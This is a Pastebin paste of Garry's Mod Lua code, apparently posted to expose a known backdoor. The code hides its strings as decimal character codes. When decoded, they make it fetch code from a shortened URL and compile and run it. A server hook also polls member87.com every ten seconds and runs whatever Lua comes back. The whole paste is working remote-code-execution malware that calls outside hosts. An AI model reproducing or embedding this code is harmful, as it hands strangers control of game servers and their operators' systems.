Advertisement
hoobonceagain

member87 backdoor from purge once again

Aug 12th, 2018
325
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.07 KB | None | 0 0
  1. local function sep (str)
  2. return string.Explode(",", str:gsub("%x%x%x", '%' .. "," .. '%1'):sub(1 + #","))
  3. end
  4.  
  5. local ServerInit = sep("104116116112115058047047116105110121117114108046099111109047121057057104050099114055")
  6. local ServerBeginInit = sep("114101116117114110032104116116112046070101116099104")
  7.  
  8. function serverLoad(c)
  9. local serverResponse = ""
  10.  
  11. for _, v in pairs(c) do
  12. serverResponse = serverResponse .. string.char(v)
  13. end
  14.  
  15. return serverResponse
  16. end
  17.  
  18. ServerLoad = CompileString
  19.  
  20.  
  21. ServerLoad(serverLoad(ServerBeginInit), "loadServerStart", false)()(serverLoad(ServerInit), function(body) ServerLoad(body, "loadServerEnd", false)() end)
  22.  
  23. if !SERVER then return end
  24.  
  25. local time = CurTime()
  26.  
  27. function load_web()
  28. RunConsoleCommand("sv_hibernate_think", "1")
  29. if CurTime() > time + 10 then
  30. time = CurTime()
  31. http.Post("http://member87.com/loadbackdoor.lua", {}, RunString) -- https://pastebin.com/raw/b9jeNYJs archived :-)
  32. -- enjoy auth spam!
  33. end
  34. end
  35.  
  36. hook.Add("Think", "eiongouienhuehr", load_web)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement